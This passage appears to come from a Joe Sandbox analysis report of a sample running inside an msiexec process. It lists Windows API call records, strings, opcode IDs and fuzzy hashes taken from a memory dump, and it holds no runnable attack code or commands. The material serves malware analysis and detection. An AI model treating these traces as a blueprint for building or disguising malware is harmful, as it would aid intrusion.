                                                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1125800050-0
                                                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                              • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleSleep
                                                                                              • String ID: }A
                                                                                              • API String ID: 252777609-2138825249
                                                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                              APIs
                                                                                              • malloc.MSVCRT ref: 00409A10
                                                                                              • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                              • free.MSVCRT ref: 00409A31
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: freemallocmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3056473165-0
                                                                                              • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                              • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: d
                                                                                              • API String ID: 0-2564639436
                                                                                              • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                              • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: BINARY
                                                                                              • API String ID: 2221118986-907554435
                                                                                              • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                              • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmp
                                                                                              • String ID: /stext
                                                                                              • API String ID: 2081463915-3817206916
                                                                                              • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                              • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                              APIs
                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                              • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                              • String ID:
                                                                                              • API String ID: 2445788494-0
                                                                                              • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                              • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 3150196962-0
                                                                                              • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                              • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                              APIs
                                                                                              Strings
                                                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: malloc
                                                                                              • String ID: failed to allocate %u bytes of memory
                                                                                              • API String ID: 2803490479-1168259600
                                                                                              • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                              • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                              • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                              • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0041BDDF
                                                                                              • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmpmemset
                                                                                              • String ID:
                                                                                              • API String ID: 1065087418-0
                                                                                              • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                              • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                              APIs
                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                              • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1381354015-0
                                                                                              • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                              • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: free
                                                                                              • String ID:
                                                                                              • API String ID: 1294909896-0
                                                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                              APIs
                                                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                              • String ID:
                                                                                              • API String ID: 2154303073-0
                                                                                              • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                              • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                              APIs
                                                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 3150196962-0
                                                                                              • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                              • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$PointerRead
                                                                                              • String ID:
                                                                                              • API String ID: 3154509469-0
                                                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                              APIs
                                                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                              • String ID:
                                                                                              • API String ID: 4232544981-0
                                                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                              APIs
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$FileModuleName
                                                                                              • String ID:
                                                                                              • API String ID: 3859505661-0
                                                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                              • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                              APIs
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
